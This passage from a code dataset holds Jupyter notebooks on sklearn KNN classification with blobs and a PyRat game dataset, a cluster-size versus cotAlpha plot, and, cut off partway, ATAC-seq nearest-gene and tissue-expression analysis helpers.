", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED\n### CHECK THE SHAPES OF X AND Y \n### SAVE X AND Y IN A NPZ FILE \n\nprint(x.shape,y.shape)\nnp.savez(\"dataset.npz\",x=x,y=y)", "_____no_output_____" ] ], [ [ "Part 2 - Basics of machine learning using sklearn\n--", "_____no_output_____" ], [ "sklearn is a very powerful package that implements most machine learning methods. sklearn also includes cross-validation procedures in order to prevent overfitting, many useful metrics and data manipulation techniques that enables very careful experimentations with machine learning. It is also very straightforward to use. We will introduce a few basic concepts of sklearn. ", "_____no_output_____" ], [ "First, it is very easy to simulate data with sklearn. ", "_____no_output_____" ] ], [ [ "from sklearn.datasets import make_blobs", "_____no_output_____" ] ], [ [ "Use the function make_blobs to generate clouds of points with $d=2$, and visualize them using the function scatter from matplotlib.pyplot. You can generate as many samples as you want.\n\nYou can generate several clouds of points using the argument centers. We recommend using random_state=0 so that your results are from the same distribution from our tests \n\nVocabulary : n_samples is the number of generated samples, n_features is $d$ (number of dimensions), centers are the number of classes. 
\n\nhint : you can use the output \"y\" as an argument for the color argument (\"c\") of the scatter function", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED - generate blobs\n\nx_blobs,y_blobs = make_blobs(n_samples=2000,n_features=2,centers=4,random_state=0)\n", "_____no_output_____" ], [ "### CELL TO BE COMPLETED - plot\n### Don't forget to import pyplot and use %matplotlib inline\n\nimport matplotlib.pyplot as plt \n\n%matplotlib inline \n\nplt.scatter(x_blobs[:,0],x_blobs[:,1],c=y_blobs) \n# Here we use indexing to get feature 0 from all examples as the x-axis of our graph.\n# Feature 1 from x is used as the y-axis of the graph. \n# The color of the points is determined by the value in y \n", "_____no_output_____" ] ], [ [ "You can use the other arguments from make_blobs in order to change the variance of the blobs, or the coordinates of their center. You can also experiment in higher dimension, although it becomes difficult to visualize. ", "_____no_output_____" ], [ "sklearn has many other data generators, as well as ways to load standard datasets of various sizes. Check them out here : \n\nhttp://scikit-learn.org/stable/datasets/index.html\n", "_____no_output_____" ], [ "Now that we have generated a simple dataset, let's try to do a basic supervised learning approach. \n\nFirst, in order to mesure the model capability of generalizing, we will have to split the dataset into a training set and a test set. This split is also called cross validation. 
The test set is a part of your dataset that your model will not see during the training and will be used as a proxy for your \"real world\" examples.\n\n<center><img src=\"https://cdn-images-1.medium.com/max/1600/1*u03UsvBGwkYD4E7BObpcaw.png\"></center>\n<center><small>Image taken from https://towardsdatascience.com/machine-learning-workflow-on-diabetes-data-part-01-573864fcc6b8</small></center>", "_____no_output_____" ], [ "Sklearn has functions to do so, with parameters controlling how to split the dataset so we are going to be showing how you should do. \n\nUse the train_test_split function in order to generate x_train,x_test, y_train, y_test, from the blobs we just generated, here we split the dataset in 80% train and 20% test. We use random_state = 0 so that the function always returns the same split.", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split\n\n#### CELL TO BE COMPLETED \n\nx_train, x_test, y_train, y_test = train_test_split(x_blobs,y_blobs,test_size=0.2,random_state=0)", "_____no_output_____" ] ], [ [ "Check the shapes of the generated vectors", "_____no_output_____" ] ], [ [ "x_train.shape,x_test.shape,x_blobs.shape", "_____no_output_____" ] ], [ [ "Let's use a K-Nearest Neighbor classifier to test whether we can classify this data. Create a <b>classifier</b>, train it using your <b> training set </b> and evaluate it by its <b>accuracy</b> on both <b>the train and test sets</b>. \n\nA k-nearest neighbor classifier (also known as KNN) is a method where for each object that you want to predict the class you look at the K (an hyperparameter) nearest examples from the training (using a distance metric, in our case the euclidean distance). 
This object is then classified by a majority vote from those neighbors, in other words the object is predicted with the most common class among its neighbours.\n\nTo use a Nearest Neighbor with sklearn you have to use the class [KNeighborsClassifier](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier).\n\nThe sklearn API is consistent between the methods. This means that for almost every method they propose you can train it using [object.fit](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.fit), you can use it to make prediction with [object.predict](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.predict) and finally verify the <b>accuracy</b> of the method using [object.score](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.score)", "_____no_output_____" ] ], [ [ "from sklearn.neighbors import KNeighborsClassifier\nk = 1\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\n### CELL TO BE COMPLETED - train the classifier and get the accuracy in both sets.\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "Accuracy on the training set 100.0%\nAccuracy on the test set 91.0%\n" ] ], [ [ "Your classifier should have a train accuracy of 1, while the test accuracy should be high but not perfect.\n\nThis is caused by the bias-variance trade-off. 
The 1NN classifier always has a bias of 0 (it perfectly classifies the training set) but it should have a high variance given that having one more example in the training set can completely change a decision.\n\nTo try to avoid having such a high variance, test different values of k and plot the accuracies given the different values of the hyperparameter k. \n\nIf you have time we advise you to do the same analysis but varying the train/test split size.", "_____no_output_____" ] ], [ [ "train_acc = list()\ntest_acc = list() # list to add the test set accuracies\ntest_ks = range(1,25)# list containing values of k to be tested\n\n# CELL TO BE COMPLETED - Train networks with varying k\nfor k in tqdm.tqdm(test_ks):\n local_classifier = KNeighborsClassifier(n_neighbors=k)\n local_classifier.fit(x_train,y_train)\n train_acc.append(local_classifier.score(x_train,y_train))\n test_acc.append(local_classifier.score(x_test,y_test))\n\nplt.plot(test_ks,train_acc,color=\"blue\",label=\"train set\")\nplt.plot(test_ks,test_acc,color=\"green\",label=\"test set\")\nplt.xlabel(\"K\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nprint(\"Best k: {}, Best test accuracy {}%\".format(test_ks[np.argmax(test_acc)],max(test_acc)*100))", "100%|██████████| 24/24 [00:00<00:00, 57.20it/s]\n" ] ], [ [ "With the classifier trained, bias-variance analysed, it is now time to look at other metrics based on your results. It is important to remember that accuracy is a key metric, but it is not the <b> only </b> metric you should be focusing on.\n\nWe are going to be printing a [classification report](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.classification_report.html#sklearn.metrics.classification_report) and the [confusion matrix](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.confusion_matrix.html#sklearn.metrics.confusion_matrix) for both the training and test sets\n\nIn the classification report we are going to see 3 new metrics. 
They are really important because the accuracy does not show a complete portrait of your results.\n\n* Precision: What is the percentage of cases that your model was correct while predicting the given class\n* Recall: What is the percentage of cases that your model was correct when the example was a member of the given class.\n* F1 Score: The harmonic mean from precision and recall.", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Real class\")\nplt.ylabel(\"Predicted class\")", "Training Set:\n precision recall f1-score support\n\n 0 1.00 1.00 1.00 404\n 1 1.00 1.00 1.00 397\n 2 1.00 1.00 1.00 400\n 3 1.00 1.00 1.00 399\n\navg / total 1.00 1.00 1.00 1600\n\n[[404 0 0 0]\n [ 0 397 0 0]\n [ 0 0 400 0]\n [ 0 0 0 399]]\n" ], [ "### CELL TO BE COMPLETED - Generate the report and confusion matrix for the test set.\ny_pred_test = classifier.predict(x_test)\nreport = classification_report(y_true=y_test,y_pred=y_pred_test)\nmatrix = confusion_matrix(y_true=y_test,y_pred=y_pred_test)\nprint(\"Test Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Real class\")\nplt.ylabel(\"Predicted class\")", "Test Set:\n precision recall f1-score support\n\n 0 0.80 0.90 0.84 96\n 1 0.96 0.92 0.94 103\n 2 0.90 0.84 0.87 100\n 3 0.99 0.98 0.99 101\n\navg / total 0.91 0.91 0.91 400\n\n[[86 3 6 1]\n [ 5 95 3 0]\n [15 1 84 0]\n [ 2 0 0 99]]\n" ] ], [ [ "Finally we are going to plot the decision boundaries from our model. For this you should use the function plot_boundaries given below. 
You can only do this if the tensor representing your data is two dimensional.\n\nThis function will be testing our model with values ranging from the smallest x to the highest x and from the lowest y to the highest y each varying by $h$ and plotting it nicely. [Link to the original implementation](http://scikit-learn.org/stable/auto_examples/neighbors/plot_classification.html#sphx-glr-auto-examples-neighbors-plot-classification-py)", "_____no_output_____" ] ], [ [ "from matplotlib.colors import ListedColormap\ndef plot_boundaries(classifier,X,Y,h=0.2):\n x0_min, x0_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x1_min, x1_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n x0, x1 = np.meshgrid(np.arange(x0_min, x0_max,h),\n np.arange(x1_min, x1_max,h))\n dataset = np.c_[x0.ravel(),x1.ravel()]\n Z = classifier.predict(dataset)\n\n # Put the result into a color plot\n Z = Z.reshape(x0.shape)\n plt.figure()\n plt.pcolormesh(x0, x1, Z)\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=Y,\n edgecolor='k', s=20)\n plt.xlim(x0.min(), x0.max())\n plt.ylim(x1.min(), x1.max())\nplot_boundaries(classifier,x_train,y_train)", "_____no_output_____" ] ], [ [ "Part 3 - Application to PyRat Datasets\n--\n\nNow it is your turn, generate a pyrat dataset, load it in the notebook and evaluate a KNN classifier using sklearn", "_____no_output_____" ], [ "In this corrected version of TP1, we load an example generated dataset", "_____no_output_____" ] ], [ [ "x = np.load(\"dataset_correction.npz\")['x']\ny = np.load(\"dataset_correction.npz\")['y']", "_____no_output_____" ] ], [ [ "First we check the shapes for our x and y that we defined before", "_____no_output_____" ] ], [ [ "x.shape,y.shape", "_____no_output_____" ] ], [ [ "As we did in the make blobs case, we are going to be splitting our data in train and test splits", "_____no_output_____" ] ], [ [ "x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2,random_state=0)", "_____no_output_____" ] ], [ [ "We 
train a KNN classifier", "_____no_output_____" ] ], [ [ "from sklearn.neighbors import KNeighborsClassifier\nk = 1\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\n### CELL TO BE COMPLETED - train the classifier and get the accuracy in both sets.\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "Accuracy on the training set 100.0%\nAccuracy on the test set 47.5%\n" ] ], [ [ "We find the best k value for this split. Normally this would be done over the mean best k value over several train/test splits", "_____no_output_____" ] ], [ [ "train_acc = list()\ntest_acc = list() # list to add the test set accuracies\ntest_ks = range(1,25)# list containing values of k to be tested\n\n# CELL TO BE COMPLETED - Train networks with varying k\nfor k in tqdm.tqdm(test_ks):\n local_classifier = KNeighborsClassifier(n_neighbors=k,n_jobs=-1)\n local_classifier.fit(x_train,y_train)\n train_acc.append(local_classifier.score(x_train,y_train))\n test_acc.append(local_classifier.score(x_test,y_test))\n\nplt.plot(test_ks,train_acc,color=\"blue\",label=\"train accuracy\")\nplt.plot(test_ks,test_acc,color=\"green\",label=\"test accuracy\")\nplt.xlabel(\"K\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nprint(\"Best k: {}, Best test accuracy {}%\".format(test_ks[np.argmax(test_acc)],max(test_acc)*100))\n\n\n#Retrain the classifier with the best k for the analysis\n\nfrom sklearn.neighbors import KNeighborsClassifier\nk = test_ks[np.argmax(test_acc)]\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "100%|██████████| 24/24 [00:07<00:00, 3.00it/s]\n" ] ], [ [ "Show the classification report and confusion 
matrix", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\n\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")", "Training Set:\n precision recall f1-score support\n\n -1.0 0.57 0.73 0.64 344\n 0.0 0.31 0.04 0.07 99\n 1.0 0.63 0.61 0.62 357\n\navg / total 0.56 0.59 0.56 800\n\n[[250 5 89]\n [ 55 4 40]\n [137 4 216]]\n" ] ], [ [ "Here we see that differently from the make blobs case the classes are not balanced, so even if you were correctly classyfing all of the draw examples, the color on the confusion matrix would make it seem like a bad model for that class. We have to normalize the confusion matrix by the amount of examples on each class, so that the sum of each row of the matrix is 1.", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nnormalized_matrix = matrix/np.sum(matrix,axis=1)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\n\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")\n\nplt.matshow(normalized_matrix,vmin=0,vmax=1)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\");", "Training Set:\n precision recall f1-score support\n\n -1.0 0.57 0.73 0.64 344\n 0.0 0.31 0.04 0.07 99\n 1.0 0.63 0.61 0.62 357\n\navg / total 0.56 0.59 0.56 800\n\n[[250 5 89]\n [ 55 4 40]\n [137 4 216]]\n" ] ], [ [ "And now the test set", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED - Generate the report and confusion matrix for the test 
set.\ny_pred_test = classifier.predict(x_test)\nreport = classification_report(y_true=y_test,y_pred=y_pred_test)\nmatrix = confusion_matrix(y_true=y_test,y_pred=y_pred_test)\nnormalized_matrix = matrix/np.sum(matrix,axis=1)\n\nprint(\"Test Set:\")\nprint(report)\nprint(matrix)\nprint(normalized_matrix)\n\n\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")\n\nplt.matshow(normalized_matrix,vmin=0,vmax=1)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\");", "Test Set:\n precision recall f1-score support\n\n -1.0 0.60 0.58 0.59 96\n 0.0 0.33 0.05 0.08 22\n 1.0 0.50 0.63 0.56 82\n\navg / total 0.53 0.55 0.52 200\n\n[[56 1 39]\n [ 9 1 12]\n [29 1 52]]\n[[ 0.58333333 0.04545455 0.47560976]\n [ 0.09375 0.04545455 0.14634146]\n [ 0.30208333 0.04545455 0.63414634]]\n" ] ], [ [ "Here we can see that we have a real problem identifying the draws. This is caused by a problem called [Class Imbalance](http://www.chioka.in/class-imbalance-problem/).\n\nThis problem can create a bias in most algorithms leading to a poor recall percentage. On the other side of class imbalance we can see that the network overpredicts the -1 result, leading to a good recall percentage, but not necessarily good precision. Looking the effects of doing class balancing (using the indexing ideas from the end of TP0) could be very interesting for your project!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e7314752f6075129644b4986de6363cab4e3e6d1
12,717
ipynb
Jupyter Notebook
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
2
2022-01-21T23:50:57.000Z
2022-02-06T01:11:18.000Z
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
null
null
null
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
4
2021-12-25T21:53:26.000Z
2022-03-07T23:08:09.000Z
110.582609
10,376
0.881419
[ [ [ "import numpy as np\nimport pandas as pd\nfrom pandas import read_csv\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "df1 = pd.read_csv('clusterData.csv', header=None)", "_____no_output_____" ], [ "df1.columns = ['binBegin', 'binEnd', 'nEntries','avg', 'Sem']", "_____no_output_____" ], [ "#df1\navgList = list(df1['avg'])\n#avgList\nsemList = list(df1['Sem'])\n#semList\nxList = list(df1['binBegin'])\ny_error = semList", "_____no_output_____" ], [ "y_error = semList\nplt.scatter(xList,avgList)\nplt.ylabel('x-size')\nplt.xlabel('cotAlpha')\nplt.title('x-clusterSize vs cotAlpha')\n#plt.errorbar(xList, avgList, yerr = y_error,fmt='.',ecolor = 'red',)\nplt.errorbar(xList, avgList, yerr = y_error, fmt='+', color='white')\nplt.savefig('clusterCotAlpha.png')", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e7314b23d99e30cda10163bae8f08d2d07157258
344,850
ipynb
Jupyter Notebook
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
1
2021-04-23T01:45:29.000Z
2021-04-23T01:45:29.000Z
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
null
null
null
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
null
null
null
165.713599
244,620
0.837033
[ [ [ "%matplotlib notebook\n\nfrom collections import Counter\nimport dill\nimport glob\nimport igraph as ig\nimport itertools\nimport leidenalg\n#import magic\nimport matplotlib\nfrom matplotlib import pyplot\nimport numba\nimport numpy\nimport os\nimport pickle\nfrom plumbum import local\nimport random\nimport re\nimport scipy\nfrom scipy.cluster import hierarchy\nimport scipy.sparse as sps\nfrom scipy.spatial import distance\nimport scipy.stats as stats\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn import neighbors\nfrom sklearn import metrics\nimport sys\nimport umap\n\n#from plotly import tools\n#import plotly.offline as py\n#import plotly.graph_objs as go\n#py.init_notebook_mode(connected=True)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/sklearn/externals/joblib/__init__.py:15: FutureWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. 
If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.\n warnings.warn(msg, category=FutureWarning)\n" ], [ "def find_nearest_genes(peak_files, out_subdir, refseq_exon_bed):\n #get unix utilities\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n\n #process the peak files to find nearest genes\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n return nearest_genes\n\ndef load_expr_db(db_path):\n if os.path.basename(db_path) == 'RepAvgGeneTPM.csv':\n with open(db_path) as lines_in:\n db_headers = lines_in.readline().strip().split(',')[1:]\n db_vals = numpy.loadtxt(db_path, delimiter=',', skiprows=1, dtype=object)[:,1:]\n else:\n with open(db_path) as lines_in:\n db_headers = lines_in.readline().strip().split('\\t')\n db_vals = numpy.loadtxt(db_path, delimiter='\\t', skiprows=1, dtype=object)\n print('Loaded DB shape: {!s}'.format(db_vals.shape))\n return (db_headers, db_vals)\n\nTOPN=500\ndef get_gene_data(genes_path, gene_expr_db, topn=TOPN):\n if isinstance(genes_path, list):\n genes_list = genes_path\n else:\n with open(genes_path) as lines_in:\n genes_list = [elt.strip().split()[:2] for elt in lines_in]\n gene_idx = 
[(numpy.where(gene_expr_db[:,0] == elt[0])[0],elt[1]) for elt in genes_list]\n gene_idx_sorted = sorted(gene_idx, key=lambda x:float(x[1]), reverse=True)\n gene_idx, gene_weights = zip(*[elt for elt in gene_idx_sorted if len(elt[0]) > 0][:topn])\n gene_idx = [elt[0] for elt in gene_idx]\n gene_data = gene_expr_db[:,1:].astype(float)[gene_idx,:]\n denom = numpy.sum(gene_data, axis=1)[:,None] + 1e-8\n gene_norm = gene_data/denom\n return gene_idx, gene_data, gene_norm, len(genes_list), numpy.array(gene_weights, dtype=float)\n\ndef sample_db(data_norm, expr_db, data_weights=None, nsamples=1000):\n samples = []\n rs = numpy.random.RandomState(15321)\n random_subset = numpy.arange(expr_db.shape[0])\n num_to_select = data_norm.shape[0]\n for idx in range(nsamples):\n rs.shuffle(random_subset)\n db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n denom = numpy.sum(db_subset, axis=1)[:None] + 1e-8\n db_subset_norm = numpy.mean((db_subset.T/denom).T, axis=0)\n if data_weights is not None:\n samples.append(numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/db_subset_norm))\n else:\n samples.append(numpy.log2(numpy.average(data_norm, axis=0, weights=None)/db_subset_norm))\n samples = numpy.vstack(samples)\n samples_mean = numpy.mean(samples, axis=0)\n samples_sem = stats.sem(samples, axis=0)\n conf_int = numpy.array([stats.t.interval(0.95, samples.shape[0]-1, \n loc=samples_mean[idx], scale=samples_sem[idx])\n for idx in range(samples.shape[1])]).T\n conf_int[0] = samples_mean - conf_int[0]\n conf_int[1] = conf_int[1] - samples_mean\n return samples_mean, conf_int\n\ndef plot_l2_tissues(nearest_genes_glob, refdata, expr_db=None, expr_db_headers=None, ncols=3, \n topn=TOPN, weights=False, nsamples=100, savefile=None, display_in_notebook=True):\n if expr_db is None:\n #Get all L2 tissue expression data to normalize the distribution of genes from peaks\n l2_tissue_db_path = os.path.join(refdata,'gexplore_l2_tissue_expr.txt')\n expr_db_headers, 
expr_db = load_expr_db(l2_tissue_db_path)\n \n gene_lists = glob.glob(nearest_genes_glob)\n if os.path.basename(gene_lists[0]).startswith('peaks'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[0].replace('peaks', '')))\n elif os.path.basename(gene_lists[0]).startswith('topic'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[1].replace('rank', '')))\n else:\n gene_lists.sort(key=lambda x:os.path.basename(x).split('.')[0])\n gene_list_data = [(os.path.basename(path).split('.')[0], get_gene_data(path, expr_db, topn=topn)) for path in gene_lists]\n print('\\n'.join(['{!s} nearest genes: found {!s} out of {!s} total'.format(fname, data.shape[0], gene_list_len)\n for (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in gene_list_data]))\n \n l2_tissue_colors = [('Body wall muscle', '#e51a1e'),\n ('Intestinal/rectal muscle', '#e51a1e'),\n ('Pharyngeal muscle', '#377db8'),\n ('Pharyngeal epithelia', '#377db8'),\n ('Pharyngeal gland', '#377db8'),\n ('Seam cells', '#4eae4a'),\n ('Non-seam hypodermis', '#4eae4a'),\n ('Rectum', '#4eae4a'),\n ('Ciliated sensory neurons', '#984ea3'),\n ('Oxygen sensory neurons', '#984ea3'),\n ('Touch receptor neurons', '#984ea3'),\n ('Cholinergic neurons', '#984ea3'),\n ('GABAergic neurons', '#984ea3'),\n ('Pharyngeal neurons', '#984ea3'),\n ('flp-1(+) interneurons', '#984ea3'),\n ('Other interneurons', '#984ea3'),\n ('Canal associated neurons', '#984ea3'),\n ('Am/PH sheath cells', '#ff8000'),\n ('Socket cells', '#ff8000'),\n ('Excretory cells', '#ff8000'),\n ('Intestine', '#fcd800'),\n ('Germline', '#f97fc0'),\n ('Somatic gonad precursors', '#f97fc0'),\n ('Distal tip cells', '#f97fc0'),\n ('Vulval precursors', '#f97fc0'),\n ('Sex myoblasts', '#f97fc0'),\n ('Coelomocytes', '#a75629')]\n idx_by_color = {}\n for idx, (name, color) in enumerate(l2_tissue_colors):\n try:\n idx_by_color[color][1].append(idx)\n except KeyError:\n idx_by_color[color] = [name, [idx]]\n \n# rs = 
numpy.random.RandomState(15321)\n# random_subset = numpy.arange(expr_db.shape[0])\n# rs.shuffle(random_subset)\n# #num_to_select = int(numpy.mean([neuron_data.shape[0], emb_muscle_data.shape[0], l2_muscle_data.shape[0]]))\n# num_to_select = len(random_subset)\n# l2_tissue_db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n# denom = numpy.sum(l2_tissue_db_subset, axis=1)[:,None] + 1e-8\n# l2_tissue_db_norm = numpy.mean(l2_tissue_db_subset/denom, axis=0)\n print('Tissue DB norm shape: {!s}'.format(expr_db.shape))\n\n pyplot.rcParams.update({'xtick.labelsize':14,\n 'ytick.labelsize':14,\n 'xtick.major.pad':8})\n\n ind = numpy.arange(len(expr_db_headers) - 1)\n width = 0.66\n axis_fontsize = 18\n title_fontsize = 19\n nrows = int(numpy.ceil(len(gene_list_data)/float(ncols)))\n fig, axes = pyplot.subplots(nrows=nrows, ncols=ncols, figsize=(7 * ncols, 7 * nrows), sharey=True)\n for idx, (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in enumerate(gene_list_data):\n ax_idx = (idx//ncols, idx%ncols) if nrows > 1 else idx\n# to_plot = numpy.log2(numpy.mean(data_norm, axis=0)/l2_tissue_db_norm)\n# import pdb; pdb.set_trace()\n if weights is True:\n# to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/l2_tissue_db_norm)\n to_plot, errs = sample_db(data_norm, expr_db, data_weights=gene_weights, nsamples=nsamples)\n else:\n# to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=None)/l2_tissue_db_norm)\n to_plot, errs = sample_db(data_norm, expr_db, data_weights=None, nsamples=nsamples)\n for idx, (name, color) in enumerate(l2_tissue_colors):\n axes[ax_idx[0],ax_idx[1]].bar(ind[idx], to_plot[idx], width, yerr=errs[:,idx][:,None], color=color, label=name)\n axes[ax_idx[0],ax_idx[1]].axhline(0, color='k')\n axes[ax_idx[0],ax_idx[1]].set_xlim((-1, len(expr_db_headers)))\n axes[ax_idx[0],ax_idx[1]].set_title('{!s}\\n({!s} genes)\\n'.format(fname, data.shape[0]), fontsize=title_fontsize)\n 
axes[ax_idx[0],ax_idx[1]].set_ylabel('Log2 ratio of mean expr proportion\\n(ATAC targets:Random genes)', fontsize=axis_fontsize)\n axes[ax_idx[0],ax_idx[1]].set_xlabel('L2 tissues', fontsize=axis_fontsize)\n axes[ax_idx[0],ax_idx[1]].set_xticks(ind + width/2)\n axes[ax_idx[0],ax_idx[1]].set_xticklabels([])\n #axes[0].set_xticklabels(expr_db_headers[1:], rotation=90)\n if nrows > 1:\n axes[0,ncols-1].legend(bbox_to_anchor=[1.0,1.0])\n else:\n axes[-1].legend(bbox_to_anchor=[1.0,1.0])\n\n if display_in_notebook is True:\n fig.tight_layout()\n if savefile is not None:\n fig.savefig(savefile, bbox_inches='tight')\n\ndef plot_stages(nearest_genes_glob, refdata, expr_db=None, expr_db_headers=None, ncols=3, topn=TOPN, weights=False):\n if expr_db is None:\n #Get all stages expression data to normalize the distribution of genes from peaks\n stage_db_path = os.path.join(refdata,'gexplore_stage_expr.txt')\n expr_db_headers, expr_db = load_expr_db(stage_db_path)\n\n gene_lists = glob.glob(nearest_genes_glob)\n if os.path.basename(gene_lists[0]).startswith('peaks'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[0].replace('peaks', '')))\n elif os.path.basename(gene_lists[0]).startswith('topic'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[1].replace('rank', 